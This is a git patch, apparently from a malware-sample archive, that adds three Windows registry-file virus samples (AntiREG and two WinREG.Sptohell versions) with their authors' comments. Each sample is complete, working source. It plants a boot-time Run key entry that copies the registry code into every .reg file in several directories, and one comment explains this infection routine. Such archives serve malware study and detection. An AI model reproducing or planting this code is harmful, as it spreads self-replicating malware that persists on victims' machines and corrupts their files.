From 6f6b922ed18bca7d897cb8dcb8025f97241535d5 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 20:03:30 -0600 Subject: [PATCH] Add files via upload --- Other/Virus.WinREG.Antireg.b | 13 +++++++++++++ Other/Virus.WinREG.Sptohell | 24 ++++++++++++++++++++++++ Other/Virus.WinREG.Sptohell.b | 14 ++++++++++++++ 3 files changed, 51 insertions(+) create mode 100644 Other/Virus.WinREG.Antireg.b create mode 100644 Other/Virus.WinREG.Sptohell create mode 100644 Other/Virus.WinREG.Sptohell.b diff --git a/Other/Virus.WinREG.Antireg.b b/Other/Virus.WinREG.Antireg.b new file mode 100644 index 00000000..02fe7cfd --- /dev/null +++ b/Other/Virus.WinREG.Antireg.b @@ -0,0 +1,13 @@ +REGEDIT4 + +;;-------------------------------;; +;; ;; +;; AntiREG (The First REG Virus) ;; +;; Coded By Lys Kovick ;; +;; Special Thanks To Phage ;; +;; ;; +;;-------------------------------;; + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + diff --git a/Other/Virus.WinREG.Sptohell b/Other/Virus.WinREG.Sptohell new file mode 100644 index 00000000..c7b96c44 --- /dev/null +++ b/Other/Virus.WinREG.Sptohell @@ -0,0 +1,24 @@ +REGEDIT 4 + +;; WinREG.Wow +;; written by SeCoNd PaRt To HeLl +;; for my Virus Database + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + +;; Wow +;; WowWow +;; WowWowWow +;; WowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWow +;; WowWowWow +;; WowWow +;; Wow \ No newline at end of file diff --git a/Other/Virus.WinREG.Sptohell.b b/Other/Virus.WinREG.Sptohell.b new file mode 100644 index 00000000..c2fca8c0 --- /dev/null +++ b/Other/Virus.WinREG.Sptohell.b @@ -0,0 +1,14 @@ +REGEDIT 4 + +;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- *************** +;; +;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus +;; in any ezine before. And I think, much ppl don't know, that such viruses exist. +;; +;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every +;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies +;; itself (the code in the registry) to these .REG-files. + + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" \ No newline at end of file